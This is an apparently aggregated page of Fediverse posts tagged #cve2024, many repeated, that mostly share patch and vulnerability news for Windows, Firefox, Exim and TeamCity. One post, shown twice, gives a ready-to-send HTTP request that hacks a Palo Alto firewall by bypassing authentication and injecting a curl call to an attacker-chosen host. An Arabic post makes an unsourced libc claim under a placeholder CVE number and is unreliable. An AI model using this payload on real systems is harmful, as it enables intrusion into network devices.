#cve2024 — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #cve2024, aggregated by home.social.
-
⚠️ تحذير لمستخدمي لينكس: ثغرة CVE‑2024‑XXXXX في مكتبة libc تسمح بسرقة مفاتيح SSH والوصول الكامل إلى الخوادم.
🔑 أهم ما يجب فعله الآن
- حدّث جميع التوزيعات إلى الإصدار المصحّح.
- فعّل المصادقة الثنائية وقلل أذونات ملفات المفاتيح.
- راقب سجلات الدخول للأنشطة غير العادية. -
⚠️ تحذير لمستخدمي لينكس: ثغرة CVE‑2024‑XXXXX في مكتبة libc تسمح بسرقة مفاتيح SSH والوصول الكامل إلى الخوادم.
🔑 أهم ما يجب فعله الآن
- حدّث جميع التوزيعات إلى الإصدار المصحّح.
- فعّل المصادقة الثنائية وقلل أذونات ملفات المفاتيح.
- راقب سجلات الدخول للأنشطة غير العادية. -
🚨 The Great CVE-2024-Yikes "Oopsie" Saga 🚨: Another day, another "critical" incident resolved by sheer accident 🙄. Apparently, a chain reaction of security fails involving #JavaScript, #Rust, and #Python ended up being "somehow fine" in 73 hours. But don't worry, they totally take security seriously—just like their 14 previous incidents! 😂🔒
https://nesbitt.io/2026/02/03/incident-report-cve-2024-yikes.html #CVE2024 #Yikes #SecurityFails #14Incidents #HackerNews #ngated -
🚨 The Great CVE-2024-Yikes "Oopsie" Saga 🚨: Another day, another "critical" incident resolved by sheer accident 🙄. Apparently, a chain reaction of security fails involving #JavaScript, #Rust, and #Python ended up being "somehow fine" in 73 hours. But don't worry, they totally take security seriously—just like their 14 previous incidents! 😂🔒
https://nesbitt.io/2026/02/03/incident-report-cve-2024-yikes.html #CVE2024 #Yikes #SecurityFails #14Incidents #HackerNews #ngated -
🚨 The Great CVE-2024-Yikes "Oopsie" Saga 🚨: Another day, another "critical" incident resolved by sheer accident 🙄. Apparently, a chain reaction of security fails involving #JavaScript, #Rust, and #Python ended up being "somehow fine" in 73 hours. But don't worry, they totally take security seriously—just like their 14 previous incidents! 😂🔒
https://nesbitt.io/2026/02/03/incident-report-cve-2024-yikes.html #CVE2024 #Yikes #SecurityFails #14Incidents #HackerNews #ngated -
🚨 The Great CVE-2024-Yikes "Oopsie" Saga 🚨: Another day, another "critical" incident resolved by sheer accident 🙄. Apparently, a chain reaction of security fails involving #JavaScript, #Rust, and #Python ended up being "somehow fine" in 73 hours. But don't worry, they totally take security seriously—just like their 14 previous incidents! 😂🔒
https://nesbitt.io/2026/02/03/incident-report-cve-2024-yikes.html #CVE2024 #Yikes #SecurityFails #14Incidents #HackerNews #ngated -
🚨 The Great CVE-2024-Yikes "Oopsie" Saga 🚨: Another day, another "critical" incident resolved by sheer accident 🙄. Apparently, a chain reaction of security fails involving #JavaScript, #Rust, and #Python ended up being "somehow fine" in 73 hours. But don't worry, they totally take security seriously—just like their 14 previous incidents! 😂🔒
https://nesbitt.io/2026/02/03/incident-report-cve-2024-yikes.html #CVE2024 #Yikes #SecurityFails #14Incidents #HackerNews #ngated -
Kernel-hack-drill and exploiting CVE-2024-50264 in the Linux kernel
https://a13xp0p0v.github.io/2025/09/02/kernel-hack-drill-and-CVE-2024-50264.html
#HackerNews #KernelHack #Drill #CVE2024 #LinuxKernel #Cybersecurity #Exploit
-
Kernel-hack-drill and exploiting CVE-2024-50264 in the Linux kernel
https://a13xp0p0v.github.io/2025/09/02/kernel-hack-drill-and-CVE-2024-50264.html
#HackerNews #KernelHack #Drill #CVE2024 #LinuxKernel #Cybersecurity #Exploit
-
Kernel-hack-drill and exploiting CVE-2024-50264 in the Linux kernel
https://a13xp0p0v.github.io/2025/09/02/kernel-hack-drill-and-CVE-2024-50264.html
#HackerNews #KernelHack #Drill #CVE2024 #LinuxKernel #Cybersecurity #Exploit
-
Kernel-hack-drill and exploiting CVE-2024-50264 in the Linux kernel
https://a13xp0p0v.github.io/2025/09/02/kernel-hack-drill-and-CVE-2024-50264.html
#HackerNews #KernelHack #Drill #CVE2024 #LinuxKernel #Cybersecurity #Exploit
-
Kernel-hack-drill and exploiting CVE-2024-50264 in the Linux kernel
https://a13xp0p0v.github.io/2025/09/02/kernel-hack-drill-and-CVE-2024-50264.html
#HackerNews #KernelHack #Drill #CVE2024 #LinuxKernel #Cybersecurity #Exploit
-
🐍 Exciting news for Python enthusiasts! Check out "python strikes again" by Low Level! In this video, they dive into CVE-2024-48990 and explore how the needsrestart program can automatically restart outdated packages. Don't miss it! Watch here: https://youtu.be/CDtIS8XaJDY or Invidious: https://invidious.reallyaweso.me/watch?v=CDtIS8XaJDY #Python #CVE2024 #LowLevel #Programming #CyberSecurity
-
🐍 Exciting news for Python enthusiasts! Check out "python strikes again" by Low Level! In this video, they dive into CVE-2024-48990 and explore how the needsrestart program can automatically restart outdated packages. Don't miss it! Watch here: https://youtu.be/CDtIS8XaJDY or Invidious: https://invidious.reallyaweso.me/watch?v=CDtIS8XaJDY #Python #CVE2024 #LowLevel #Programming #CyberSecurity
-
🐍 Exciting news for Python enthusiasts! Check out "python strikes again" by Low Level! In this video, they dive into CVE-2024-48990 and explore how the needsrestart program can automatically restart outdated packages. Don't miss it! Watch here: https://youtu.be/CDtIS8XaJDY or Invidious: https://invidious.reallyaweso.me/watch?v=CDtIS8XaJDY #Python #CVE2024 #LowLevel #Programming #CyberSecurity
-
🐍 Exciting news for Python enthusiasts! Check out "python strikes again" by Low Level! In this video, they dive into CVE-2024-48990 and explore how the needsrestart program can automatically restart outdated packages. Don't miss it! Watch here: https://youtu.be/CDtIS8XaJDY or Invidious: https://invidious.reallyaweso.me/watch?v=CDtIS8XaJDY #Python #CVE2024 #LowLevel #Programming #CyberSecurity
-
🐍 Exciting news for Python enthusiasts! Check out "python strikes again" by Low Level! In this video, they dive into CVE-2024-48990 and explore how the needsrestart program can automatically restart outdated packages. Don't miss it! Watch here: https://youtu.be/CDtIS8XaJDY or Invidious: https://invidious.reallyaweso.me/watch?v=CDtIS8XaJDY #Python #CVE2024 #LowLevel #Programming #CyberSecurity
-
Microsoft's December Patch Tuesday is here! 🎉 It addresses 72 vulnerabilities, including a critical zero-day flaw (CVE-2024-49138) that could give attackers SYSTEM privileges. 🚨 Windows users should update ASAP to stay secure! 💻🔒 Read more about the fixes and how to apply them here: https://cyberinsider.com/windows-11-december-patch-tuesday-fixes-72-flaws-one-zero-day/ #Windows11 #CyberSecurity #PatchTuesday #CVE2024
#newz -
Microsoft's December Patch Tuesday is here! 🎉 It addresses 72 vulnerabilities, including a critical zero-day flaw (CVE-2024-49138) that could give attackers SYSTEM privileges. 🚨 Windows users should update ASAP to stay secure! 💻🔒 Read more about the fixes and how to apply them here: https://cyberinsider.com/windows-11-december-patch-tuesday-fixes-72-flaws-one-zero-day/ #Windows11 #CyberSecurity #PatchTuesday #CVE2024
#newz -
Microsoft's December Patch Tuesday is here! 🎉 It addresses 72 vulnerabilities, including a critical zero-day flaw (CVE-2024-49138) that could give attackers SYSTEM privileges. 🚨 Windows users should update ASAP to stay secure! 💻🔒 Read more about the fixes and how to apply them here: https://cyberinsider.com/windows-11-december-patch-tuesday-fixes-72-flaws-one-zero-day/ #Windows11 #CyberSecurity #PatchTuesday #CVE2024
#newz -
Microsoft's December Patch Tuesday is here! 🎉 It addresses 72 vulnerabilities, including a critical zero-day flaw (CVE-2024-49138) that could give attackers SYSTEM privileges. 🚨 Windows users should update ASAP to stay secure! 💻🔒 Read more about the fixes and how to apply them here: https://cyberinsider.com/windows-11-december-patch-tuesday-fixes-72-flaws-one-zero-day/ #Windows11 #CyberSecurity #PatchTuesday #CVE2024
#newz -
Microsoft's December Patch Tuesday is here! 🎉 It addresses 72 vulnerabilities, including a critical zero-day flaw (CVE-2024-49138) that could give attackers SYSTEM privileges. 🚨 Windows users should update ASAP to stay secure! 💻🔒 Read more about the fixes and how to apply them here: https://cyberinsider.com/windows-11-december-patch-tuesday-fixes-72-flaws-one-zero-day/ #Windows11 #CyberSecurity #PatchTuesday #CVE2024
#newz -
How to hack a #PaloAlto firewall:
POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1
-
How to hack a #PaloAlto firewall:
POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1
-
Google’s Quick Share Vulnerabilities Let Attackers Execute Remote Code https://gbhackers.com/googles-quick-share-vulnerabilities/ #CybersecurityResearch #Remotecodeexecution #CVE/vulnerability #CyberSecurityNews #Exploit #CVE2024
-
Google’s Quick Share Vulnerabilities Let Attackers Execute Remote Code https://gbhackers.com/googles-quick-share-vulnerabilities/ #CybersecurityResearch #Remotecodeexecution #CVE/vulnerability #CyberSecurityNews #Exploit #CVE2024
-
Google’s Quick Share Vulnerabilities Let Attackers Execute Remote Code https://gbhackers.com/googles-quick-share-vulnerabilities/ #CybersecurityResearch #Remotecodeexecution #CVE/vulnerability #CyberSecurityNews #Exploit #CVE2024
-
Google’s Quick Share Vulnerabilities Let Attackers Execute Remote Code https://gbhackers.com/googles-quick-share-vulnerabilities/ #CybersecurityResearch #Remotecodeexecution #CVE/vulnerability #CyberSecurityNews #Exploit #CVE2024
-
Critical Exim vulnerability affects 1.5 million servers worldwide
https://stackdiary.com/critical-exim-vulnerability-affects-1-5-million-servers-worldwide/
#Exim #Security #Vulnerability #Cybersecurity #Email #Patch #Update #Critical #Bug #MTA #Server #Protection #CVE2024 #Hacker #Threat #Safety #Admin #IT #Software #Fix #Alert #SecurityBreach #Exploits #CyberAttack #SMTP #PatchNow #ITsecurity #MailServer #Risk #Malware #CyberDefense #CVE #CISA
-
Critical Exim vulnerability affects 1.5 million servers worldwide
https://stackdiary.com/critical-exim-vulnerability-affects-1-5-million-servers-worldwide/
#Exim #Security #Vulnerability #Cybersecurity #Email #Patch #Update #Critical #Bug #MTA #Server #Protection #CVE2024 #Hacker #Threat #Safety #Admin #IT #Software #Fix #Alert #SecurityBreach #Exploits #CyberAttack #SMTP #PatchNow #ITsecurity #MailServer #Risk #Malware #CyberDefense #CVE #CISA
-
Critical Exim vulnerability affects 1.5 million servers worldwide
https://stackdiary.com/critical-exim-vulnerability-affects-1-5-million-servers-worldwide/
#Exim #Security #Vulnerability #Cybersecurity #Email #Patch #Update #Critical #Bug #MTA #Server #Protection #CVE2024 #Hacker #Threat #Safety #Admin #IT #Software #Fix #Alert #SecurityBreach #Exploits #CyberAttack #SMTP #PatchNow #ITsecurity #MailServer #Risk #Malware #CyberDefense #CVE #CISA
-
Critical Exim vulnerability affects 1.5 million servers worldwide
https://stackdiary.com/critical-exim-vulnerability-affects-1-5-million-servers-worldwide/
#Exim #Security #Vulnerability #Cybersecurity #Email #Patch #Update #Critical #Bug #MTA #Server #Protection #CVE2024 #Hacker #Threat #Safety #Admin #IT #Software #Fix #Alert #SecurityBreach #Exploits #CyberAttack #SMTP #PatchNow #ITsecurity #MailServer #Risk #Malware #CyberDefense #CVE #CISA
-
Critical Exim vulnerability affects 1.5 million servers worldwide
https://stackdiary.com/critical-exim-vulnerability-affects-1-5-million-servers-worldwide/
#Exim #Security #Vulnerability #Cybersecurity #Email #Patch #Update #Critical #Bug #MTA #Server #Protection #CVE2024 #Hacker #Threat #Safety #Admin #IT #Software #Fix #Alert #SecurityBreach #Exploits #CyberAttack #SMTP #PatchNow #ITsecurity #MailServer #Risk #Malware #CyberDefense #CVE #CISA
-
High-Impact Security Vulnerabilities in Firefox 128
Date: July 9, 2024
CVE: CVE-2024-6605 CVE-2024-6606 CVE-2024-6607 CVE-2024-6608 CVE-2024-6609 CVE-2024-6610 CVE-2024-6600 CVE-2024-6601 CVE-2024-6602 CVE-2024-6603 CVE-2024-6611 CVE-2024-6612 CVE-2024-6613 CVE-2024-6614 CVE-2024-6604 CVE-2024-6615
Vulnerability Type: Tapjacking
CWE: [[CWE-451]], [[CWE-922]]
Sources: Mozilla Security AdvisorySynopsis
Multiple security vulnerabilities were addressed in the latest Firefox 128 release, impacting both the desktop and Android versions. These vulnerabilities, if exploited, could lead to severe security breaches including tapjacking, out-of-bounds read, and memory corruption.
A list of all the CVEs mentioned in the Mozilla Foundation Security Advisory 2024-29:
- CVE-2024-6605: Firefox Android missed activation delay to prevent tapjacking (High)
- CVE-2024-6606: Out-of-bounds read in clipboard component (High)
- CVE-2024-6607: Leaving pointerlock by pressing the escape key could be prevented (Moderate)
- CVE-2024-6608: Cursor could be moved out of the viewport using pointerlock (Moderate)
- CVE-2024-6609: Memory corruption in NSS (Moderate)
- CVE-2024-6610: Form validation popups could block exiting full-screen mode (Moderate)
- CVE-2024-6600: Memory corruption in WebGL API (Moderate)
- CVE-2024-6601: Race condition in permission assignment (Moderate)
- CVE-2024-6602: Memory corruption in NSS (Moderate)
- CVE-2024-6603: Memory corruption in thread creation (Moderate)
- CVE-2024-6611: Incorrect handling of SameSite cookies (Low)
- CVE-2024-6612: CSP violation leakage when using devtools (Low)
- CVE-2024-6613: Incorrect listing of stack frames (Low)
- CVE-2024-6614: Incorrect listing of stack frames (Low)
- CVE-2024-6604: Memory safety bugs fixed in Firefox 128, Firefox ESR 115.13, and Thunderbird 115.13 (High)
- CVE-2024-6615: Memory safety bugs fixed in Firefox 128 (High)
Issue Summary
Mozilla announced fixes for several high-impact vulnerabilities in Firefox 128. Notably, CVE-2024-6606 which involves out-of-bounds read issues in the clipboard component, and CVE-2024-6609 related to memory corruption in the NSS library.
Technical Key Findings
CVE-2024-6605 allows attackers to overlay malicious prompts over legitimate permission dialogs, potentially tricking users into granting unwanted permissions. This vulnerability exploits the lack of a delay in activating permission prompts on Firefox Android, enabling immediate interactions which can be hijacked by malicious actors.
Vulnerable Products
- Firefox versions prior to 128
- Firefox ESR versions prior to 115.13
- Firefox Android versions prior to 128
Impact Assessment
If these vulnerabilities are exploited, attackers can perform actions such as reading out-of-bounds data, preventing users from exiting fullscreen mode, or executing arbitrary code. These can lead to unauthorized access to sensitive data, manipulation of browser behavior, and potential system compromises.
Patches or Workaround
Mozilla has released patches in Firefox 128, Firefox ESR 115.13, and Thunderbird 115.13 to address these vulnerabilities. Users are advised to update to the latest versions to mitigate the risks associated with these security flaws.
Tags
#Firefox #CVE2024-6605 #Tapjacking #SecurityUpdate #Mozilla #Vulnerability #MemoryCorruption #OutOfBoundsRead
-
High-Impact Security Vulnerabilities in Firefox 128
Date: July 9, 2024
CVE: CVE-2024-6605 CVE-2024-6606 CVE-2024-6607 CVE-2024-6608 CVE-2024-6609 CVE-2024-6610 CVE-2024-6600 CVE-2024-6601 CVE-2024-6602 CVE-2024-6603 CVE-2024-6611 CVE-2024-6612 CVE-2024-6613 CVE-2024-6614 CVE-2024-6604 CVE-2024-6615
Vulnerability Type: Tapjacking
CWE: [[CWE-451]], [[CWE-922]]
Sources: Mozilla Security AdvisorySynopsis
Multiple security vulnerabilities were addressed in the latest Firefox 128 release, impacting both the desktop and Android versions. These vulnerabilities, if exploited, could lead to severe security breaches including tapjacking, out-of-bounds read, and memory corruption.
A list of all the CVEs mentioned in the Mozilla Foundation Security Advisory 2024-29:
- CVE-2024-6605: Firefox Android missed activation delay to prevent tapjacking (High)
- CVE-2024-6606: Out-of-bounds read in clipboard component (High)
- CVE-2024-6607: Leaving pointerlock by pressing the escape key could be prevented (Moderate)
- CVE-2024-6608: Cursor could be moved out of the viewport using pointerlock (Moderate)
- CVE-2024-6609: Memory corruption in NSS (Moderate)
- CVE-2024-6610: Form validation popups could block exiting full-screen mode (Moderate)
- CVE-2024-6600: Memory corruption in WebGL API (Moderate)
- CVE-2024-6601: Race condition in permission assignment (Moderate)
- CVE-2024-6602: Memory corruption in NSS (Moderate)
- CVE-2024-6603: Memory corruption in thread creation (Moderate)
- CVE-2024-6611: Incorrect handling of SameSite cookies (Low)
- CVE-2024-6612: CSP violation leakage when using devtools (Low)
- CVE-2024-6613: Incorrect listing of stack frames (Low)
- CVE-2024-6614: Incorrect listing of stack frames (Low)
- CVE-2024-6604: Memory safety bugs fixed in Firefox 128, Firefox ESR 115.13, and Thunderbird 115.13 (High)
- CVE-2024-6615: Memory safety bugs fixed in Firefox 128 (High)
Issue Summary
Mozilla announced fixes for several high-impact vulnerabilities in Firefox 128. Notably, CVE-2024-6606 which involves out-of-bounds read issues in the clipboard component, and CVE-2024-6609 related to memory corruption in the NSS library.
Technical Key Findings
CVE-2024-6605 allows attackers to overlay malicious prompts over legitimate permission dialogs, potentially tricking users into granting unwanted permissions. This vulnerability exploits the lack of a delay in activating permission prompts on Firefox Android, enabling immediate interactions which can be hijacked by malicious actors.
Vulnerable Products
- Firefox versions prior to 128
- Firefox ESR versions prior to 115.13
- Firefox Android versions prior to 128
Impact Assessment
If these vulnerabilities are exploited, attackers can perform actions such as reading out-of-bounds data, preventing users from exiting fullscreen mode, or executing arbitrary code. These can lead to unauthorized access to sensitive data, manipulation of browser behavior, and potential system compromises.
Patches or Workaround
Mozilla has released patches in Firefox 128, Firefox ESR 115.13, and Thunderbird 115.13 to address these vulnerabilities. Users are advised to update to the latest versions to mitigate the risks associated with these security flaws.
Tags
#Firefox #CVE2024-6605 #Tapjacking #SecurityUpdate #Mozilla #Vulnerability #MemoryCorruption #OutOfBoundsRead
-
High-Impact Security Vulnerabilities in Firefox 128
Date: July 9, 2024
CVE: CVE-2024-6605 CVE-2024-6606 CVE-2024-6607 CVE-2024-6608 CVE-2024-6609 CVE-2024-6610 CVE-2024-6600 CVE-2024-6601 CVE-2024-6602 CVE-2024-6603 CVE-2024-6611 CVE-2024-6612 CVE-2024-6613 CVE-2024-6614 CVE-2024-6604 CVE-2024-6615
Vulnerability Type: Tapjacking
CWE: [[CWE-451]], [[CWE-922]]
Sources: Mozilla Security AdvisorySynopsis
Multiple security vulnerabilities were addressed in the latest Firefox 128 release, impacting both the desktop and Android versions. These vulnerabilities, if exploited, could lead to severe security breaches including tapjacking, out-of-bounds read, and memory corruption.
A list of all the CVEs mentioned in the Mozilla Foundation Security Advisory 2024-29:
- CVE-2024-6605: Firefox Android missed activation delay to prevent tapjacking (High)
- CVE-2024-6606: Out-of-bounds read in clipboard component (High)
- CVE-2024-6607: Leaving pointerlock by pressing the escape key could be prevented (Moderate)
- CVE-2024-6608: Cursor could be moved out of the viewport using pointerlock (Moderate)
- CVE-2024-6609: Memory corruption in NSS (Moderate)
- CVE-2024-6610: Form validation popups could block exiting full-screen mode (Moderate)
- CVE-2024-6600: Memory corruption in WebGL API (Moderate)
- CVE-2024-6601: Race condition in permission assignment (Moderate)
- CVE-2024-6602: Memory corruption in NSS (Moderate)
- CVE-2024-6603: Memory corruption in thread creation (Moderate)
- CVE-2024-6611: Incorrect handling of SameSite cookies (Low)
- CVE-2024-6612: CSP violation leakage when using devtools (Low)
- CVE-2024-6613: Incorrect listing of stack frames (Low)
- CVE-2024-6614: Incorrect listing of stack frames (Low)
- CVE-2024-6604: Memory safety bugs fixed in Firefox 128, Firefox ESR 115.13, and Thunderbird 115.13 (High)
- CVE-2024-6615: Memory safety bugs fixed in Firefox 128 (High)
Issue Summary
Mozilla announced fixes for several high-impact vulnerabilities in Firefox 128. Notably, CVE-2024-6606 which involves out-of-bounds read issues in the clipboard component, and CVE-2024-6609 related to memory corruption in the NSS library.
Technical Key Findings
CVE-2024-6605 allows attackers to overlay malicious prompts over legitimate permission dialogs, potentially tricking users into granting unwanted permissions. This vulnerability exploits the lack of a delay in activating permission prompts on Firefox Android, enabling immediate interactions which can be hijacked by malicious actors.
Vulnerable Products
- Firefox versions prior to 128
- Firefox ESR versions prior to 115.13
- Firefox Android versions prior to 128
Impact Assessment
If these vulnerabilities are exploited, attackers can perform actions such as reading out-of-bounds data, preventing users from exiting fullscreen mode, or executing arbitrary code. These can lead to unauthorized access to sensitive data, manipulation of browser behavior, and potential system compromises.
Patches or Workaround
Mozilla has released patches in Firefox 128, Firefox ESR 115.13, and Thunderbird 115.13 to address these vulnerabilities. Users are advised to update to the latest versions to mitigate the risks associated with these security flaws.
Tags
#Firefox #CVE2024-6605 #Tapjacking #SecurityUpdate #Mozilla #Vulnerability #MemoryCorruption #OutOfBoundsRead
-
High-Impact Security Vulnerabilities in Firefox 128
Date: July 9, 2024
CVE: CVE-2024-6605 CVE-2024-6606 CVE-2024-6607 CVE-2024-6608 CVE-2024-6609 CVE-2024-6610 CVE-2024-6600 CVE-2024-6601 CVE-2024-6602 CVE-2024-6603 CVE-2024-6611 CVE-2024-6612 CVE-2024-6613 CVE-2024-6614 CVE-2024-6604 CVE-2024-6615
Vulnerability Type: Tapjacking
CWE: [[CWE-451]], [[CWE-922]]
Sources: Mozilla Security AdvisorySynopsis
Multiple security vulnerabilities were addressed in the latest Firefox 128 release, impacting both the desktop and Android versions. These vulnerabilities, if exploited, could lead to severe security breaches including tapjacking, out-of-bounds read, and memory corruption.
A list of all the CVEs mentioned in the Mozilla Foundation Security Advisory 2024-29:
- CVE-2024-6605: Firefox Android missed activation delay to prevent tapjacking (High)
- CVE-2024-6606: Out-of-bounds read in clipboard component (High)
- CVE-2024-6607: Leaving pointerlock by pressing the escape key could be prevented (Moderate)
- CVE-2024-6608: Cursor could be moved out of the viewport using pointerlock (Moderate)
- CVE-2024-6609: Memory corruption in NSS (Moderate)
- CVE-2024-6610: Form validation popups could block exiting full-screen mode (Moderate)
- CVE-2024-6600: Memory corruption in WebGL API (Moderate)
- CVE-2024-6601: Race condition in permission assignment (Moderate)
- CVE-2024-6602: Memory corruption in NSS (Moderate)
- CVE-2024-6603: Memory corruption in thread creation (Moderate)
- CVE-2024-6611: Incorrect handling of SameSite cookies (Low)
- CVE-2024-6612: CSP violation leakage when using devtools (Low)
- CVE-2024-6613: Incorrect listing of stack frames (Low)
- CVE-2024-6614: Incorrect listing of stack frames (Low)
- CVE-2024-6604: Memory safety bugs fixed in Firefox 128, Firefox ESR 115.13, and Thunderbird 115.13 (High)
- CVE-2024-6615: Memory safety bugs fixed in Firefox 128 (High)
Issue Summary
Mozilla announced fixes for several high-impact vulnerabilities in Firefox 128. Notably, CVE-2024-6606 which involves out-of-bounds read issues in the clipboard component, and CVE-2024-6609 related to memory corruption in the NSS library.
Technical Key Findings
CVE-2024-6605 allows attackers to overlay malicious prompts over legitimate permission dialogs, potentially tricking users into granting unwanted permissions. This vulnerability exploits the lack of a delay in activating permission prompts on Firefox Android, enabling immediate interactions which can be hijacked by malicious actors.
Vulnerable Products
- Firefox versions prior to 128
- Firefox ESR versions prior to 115.13
- Firefox Android versions prior to 128
Impact Assessment
If these vulnerabilities are exploited, attackers can perform actions such as reading out-of-bounds data, preventing users from exiting fullscreen mode, or executing arbitrary code. These can lead to unauthorized access to sensitive data, manipulation of browser behavior, and potential system compromises.
Patches or Workaround
Mozilla has released patches in Firefox 128, Firefox ESR 115.13, and Thunderbird 115.13 to address these vulnerabilities. Users are advised to update to the latest versions to mitigate the risks associated with these security flaws.
Tags
#Firefox #CVE2024-6605 #Tapjacking #SecurityUpdate #Mozilla #Vulnerability #MemoryCorruption #OutOfBoundsRead
-
High-Impact Security Vulnerabilities in Firefox 128
Date: July 9, 2024
CVE: CVE-2024-6605 CVE-2024-6606 CVE-2024-6607 CVE-2024-6608 CVE-2024-6609 CVE-2024-6610 CVE-2024-6600 CVE-2024-6601 CVE-2024-6602 CVE-2024-6603 CVE-2024-6611 CVE-2024-6612 CVE-2024-6613 CVE-2024-6614 CVE-2024-6604 CVE-2024-6615
Vulnerability Type: Tapjacking
CWE: [[CWE-451]], [[CWE-922]]
Sources: Mozilla Security AdvisorySynopsis
Multiple security vulnerabilities were addressed in the latest Firefox 128 release, impacting both the desktop and Android versions. These vulnerabilities, if exploited, could lead to severe security breaches including tapjacking, out-of-bounds read, and memory corruption.
A list of all the CVEs mentioned in the Mozilla Foundation Security Advisory 2024-29:
- CVE-2024-6605: Firefox Android missed activation delay to prevent tapjacking (High)
- CVE-2024-6606: Out-of-bounds read in clipboard component (High)
- CVE-2024-6607: Leaving pointerlock by pressing the escape key could be prevented (Moderate)
- CVE-2024-6608: Cursor could be moved out of the viewport using pointerlock (Moderate)
- CVE-2024-6609: Memory corruption in NSS (Moderate)
- CVE-2024-6610: Form validation popups could block exiting full-screen mode (Moderate)
- CVE-2024-6600: Memory corruption in WebGL API (Moderate)
- CVE-2024-6601: Race condition in permission assignment (Moderate)
- CVE-2024-6602: Memory corruption in NSS (Moderate)
- CVE-2024-6603: Memory corruption in thread creation (Moderate)
- CVE-2024-6611: Incorrect handling of SameSite cookies (Low)
- CVE-2024-6612: CSP violation leakage when using devtools (Low)
- CVE-2024-6613: Incorrect listing of stack frames (Low)
- CVE-2024-6614: Incorrect listing of stack frames (Low)
- CVE-2024-6604: Memory safety bugs fixed in Firefox 128, Firefox ESR 115.13, and Thunderbird 115.13 (High)
- CVE-2024-6615: Memory safety bugs fixed in Firefox 128 (High)
Issue Summary
Mozilla announced fixes for several high-impact vulnerabilities in Firefox 128. Notably, CVE-2024-6606 which involves out-of-bounds read issues in the clipboard component, and CVE-2024-6609 related to memory corruption in the NSS library.
Technical Key Findings
CVE-2024-6605 allows attackers to overlay malicious prompts over legitimate permission dialogs, potentially tricking users into granting unwanted permissions. This vulnerability exploits the lack of a delay in activating permission prompts on Firefox Android, enabling immediate interactions which can be hijacked by malicious actors.
Vulnerable Products
- Firefox versions prior to 128
- Firefox ESR versions prior to 115.13
- Firefox Android versions prior to 128
Impact Assessment
If these vulnerabilities are exploited, attackers can perform actions such as reading out-of-bounds data, preventing users from exiting fullscreen mode, or executing arbitrary code. These can lead to unauthorized access to sensitive data, manipulation of browser behavior, and potential system compromises.
Patches or Workaround
Mozilla has released patches in Firefox 128, Firefox ESR 115.13, and Thunderbird 115.13 to address these vulnerabilities. Users are advised to update to the latest versions to mitigate the risks associated with these security flaws.
Tags
#Firefox #CVE2024-6605 #Tapjacking #SecurityUpdate #Mozilla #Vulnerability #MemoryCorruption #OutOfBoundsRead
-
🚨 Attention everyone! 🚨 A major security alert has been issued with the announcement of CVE-2024-27322. 📡 This critical vulnerability has significant implications, and it's essential for us to stay informed and take necessary precautions!
🔐 Cybersecurity is more important than ever, so make sure you're aware and prepared. Don't overlook this crucial update—your data's safety might depend on it!
👉 Get the full details and learn how to protect yourself: https://short.aliaslaw.com/grhqoi #CyberSecurity #StaySafe #CVE2024 #TechNews
-
🚨 Attention everyone! 🚨 A major security alert has been issued with the announcement of CVE-2024-27322. 📡 This critical vulnerability has significant implications, and it's essential for us to stay informed and take necessary precautions!
🔐 Cybersecurity is more important than ever, so make sure you're aware and prepared. Don't overlook this crucial update—your data's safety might depend on it!
👉 Get the full details and learn how to protect yourself: https://short.aliaslaw.com/grhqoi #CyberSecurity #StaySafe #CVE2024 #TechNews
-
🚨 Attention everyone! 🚨 A major security alert has been issued with the announcement of CVE-2024-27322. 📡 This critical vulnerability has significant implications, and it's essential for us to stay informed and take necessary precautions!
🔐 Cybersecurity is more important than ever, so make sure you're aware and prepared. Don't overlook this crucial update—your data's safety might depend on it!
👉 Get the full details and learn how to protect yourself: https://short.aliaslaw.com/grhqoi #CyberSecurity #StaySafe #CVE2024 #TechNews
-
🚨 Attention everyone! 🚨 A major security alert has been issued with the announcement of CVE-2024-27322. 📡 This critical vulnerability has significant implications, and it's essential for us to stay informed and take necessary precautions!
🔐 Cybersecurity is more important than ever, so make sure you're aware and prepared. Don't overlook this crucial update—your data's safety might depend on it!
👉 Get the full details and learn how to protect yourself: https://short.aliaslaw.com/grhqoi #CyberSecurity #StaySafe #CVE2024 #TechNews
-
Microsoft Patch Tuesday: 149 Security Vulnerabilities & Zero-days https://gbhackers.com/microsoft-patch-tuesday-3/ #SecurityVulnerabilities #MicrosoftPatchTuesday #CyberSecurityNews #Microsoft #Malware #CVE2024
-
Microsoft Patch Tuesday: 149 Security Vulnerabilities & Zero-days https://gbhackers.com/microsoft-patch-tuesday-3/ #SecurityVulnerabilities #MicrosoftPatchTuesday #CyberSecurityNews #Microsoft #Malware #CVE2024
-
Microsoft Patch Tuesday: 149 Security Vulnerabilities & Zero-days https://gbhackers.com/microsoft-patch-tuesday-3/ #SecurityVulnerabilities #MicrosoftPatchTuesday #CyberSecurityNews #Microsoft #Malware #CVE2024
-
Microsoft Patch Tuesday: 149 Security Vulnerabilities & Zero-days https://gbhackers.com/microsoft-patch-tuesday-3/ #SecurityVulnerabilities #MicrosoftPatchTuesday #CyberSecurityNews #Microsoft #Malware #CVE2024
-
"🚨 Urgent TeamCity Vulnerabilities Alert! Patch Now! 🚨"
JetBrains has just patched critical vulnerabilities in TeamCity On-Premises software, tagged CVE-2024-27198 and CVE-2024-27199, with alarming CVSS scores of 9.8 and 7.3. These flaws allow unauthorized access to potentially gain full control over the TeamCity servers. Versions up to 2023.11.3 are affected, urging an immediate update to v2023.11.4. Kudos to Rapid7 for the timely discovery on Feb 20, 2024. Given past abuses by notorious APT groups, securing your systems against such authentication bypasses is crucial to thwart potential supply chain assaults. 🛡️💻
🔗 Source: BleepingComputer
Tags: #JetBrains #TeamCity #CyberSecurity #VulnerabilityAlert #CVE2024-27198 #CVE2024-27199 #Rapid7 #PatchNow #SupplyChainSecurity #AuthenticationBypass #InfoSec
🌍🔐👥
-
"🚨 Urgent TeamCity Vulnerabilities Alert! Patch Now! 🚨"
